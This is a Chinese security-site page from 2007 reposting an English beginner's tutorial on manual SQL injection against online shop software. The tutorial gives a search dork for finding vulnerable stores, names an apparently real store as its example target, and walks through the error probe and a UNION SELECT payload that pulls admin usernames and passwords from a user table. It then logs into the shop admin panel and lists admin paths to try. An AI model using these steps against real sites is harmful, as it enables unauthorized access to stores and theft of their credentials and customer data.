执着成就未来 技术成就梦想
文字横幅以及760*60黄金广告位置招租,欢迎恰谈! 广告业务联系QQ:8019399 声明:在本站所投放广告内容均与本站立场无关!

您现在的位置: 中国安全在线 >> 攻防技术 >> 菜鸟学习 >> 文章正文 用户登录 新用户注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
Linux下 改IP
做个自己站内搜索引擎
MySQL中修改密码及访问限制设置详解
轻松八句话就可教会你完全搞定MySQ
教你突破网银系统
如何解决电脑无法复制粘贴文件
找回“本地连接”
无法停止通用卷设备的解决方法(无法
开始运行输入命令集锦
利用路由器防止DoS疯狂攻击
国外的一篇手工注入的文章
作者:佚名 来源:安全在线 更新时间:2007-10-5 21:21:22 【字体:
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论

PS:国外的一篇手工注入的文章,比较基础点。。懂英文的应该很容易看懂。。

引用内容
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put on end of link this sign '
now link look like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR

Products
Mcft JET Database Engine error '80040e14'

Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.

/store/shop$db.asp, line 467

If we see this error then is HACKABLE ) !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this

%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser'

Link now is

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

And put it in the browser we get the same error !!!

Ok ... now you see this numbers ...

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50

Now we removed ,50

and we now test

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

The same error and now we removed and removed number, and when we don't see this error we must see some site, on this server correct number for
exploit is -> 47 <-

http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER

Ok now we put this in browser and don't see ERROR we see some LAPTOPs

Ok ... now we find on that site numbers 3 and 4
They are small

When we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword

NOw explotable link is this

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

and look where was 3 and 4 number now there are username and password for
login in SHOPADMIN , now we are going to this link

http://www.globalasp.org.uk/store/colours$config.asp

there is LOGIN for shopadmin and we login !!!

THIS ARE PATH Where CAN BE SHOPADMINs TOO

shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力

文章录入:ls1238    责任编辑:ls1238 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系方式 | 友 情链接 | 关于我们 | 网站留言 |
    Copyright ?2003-2007 www.cnsafer.com All Rights Reserved.
    如有意见请与我们联系 Email:admin#mail.cnsafer.com 联系QQ:8589101
    友情提示:建议使用IE6.0版本, 分辩率1024*768进行浏览
    中国安全在线 敢想 敢做 挑战自我 努力做最好
    中网科技有限公司 技术支持 鄂ICP备05006475号